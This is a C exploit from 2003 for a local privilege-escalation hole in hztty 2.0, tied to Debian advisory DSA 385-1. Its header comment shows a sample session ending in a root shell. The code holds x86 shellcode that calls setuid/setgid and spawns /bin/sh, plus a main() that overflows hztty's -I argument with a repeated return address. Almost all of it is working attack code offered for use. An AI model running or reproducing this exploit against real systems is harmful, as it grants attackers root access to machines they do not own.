/*  0x333hztty => hztty 2.0 local root exploit
 *
 *  21/09/2003 - 3:33 :>
 *
 *  more info : Debian Security Advisory DSA 385-1
 *
 *  *note* I adjusted some part of hztty's code since
 *  there were some errors. hope this will not influence
 *  exploitation :> tested against Red Hat 9.0 :
 *
 * [c0wboy@0x333 c0wboy]$ gcc 0x333hztty.c -o k
 * [c0wboy@0x333 c0wboy]$ ./k
 *
 *  ---  local root exploit for hztty 2.0  ---
 *  ---  coded by c0wboy ~ www.0x333.org   ---
 * 
 * no such module "���[...]����������[...]
 *                                                                                     B`�
 *                                                               sh-2.05b# [./hztty started]  [using /dev/ttyp6]
 * sh-2.05b$ sh-2.05b# uid=0(root) gid=0(root) groups=500(c0wboy)
 *                                                               sh-2.05b#
 *
 *
 *  coded by c0wboy 
 *
 *  (c) 0x333 Outsiders Security Labs / www.0x333.org
 *
 */

#include <stdio.h>
#include <unistd.h>

#define BIN    "./hztty"
#define SIZE   272


unsigned char shellcode[] =
  "\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8"
  "\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68"
  "\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"
  "\xd2\xb0\x0b\xcd\x80" ;

int main()
{
  int i;
  char out[SIZE];
  char *own[] = { shellcode, 0x0 };

  int *hztty = (int *)(out);
  int ret = 0xbffffffa - strlen(BIN) - strlen(shellcode);

  for (i=0 ; i<SIZE-1 ; i+=4)
    *hztty++ = ret;

  hztty = 0x0;

  fprintf (stdout, "\n ---  local root exploit for hztty 2.0  ---\n");
  fprintf (stdout, " ---  coded by c0wboy ~ www.0x333.org   ---\n\n");

  execle (BIN, BIN, "-I", out, 0x0, own, 0x0);
}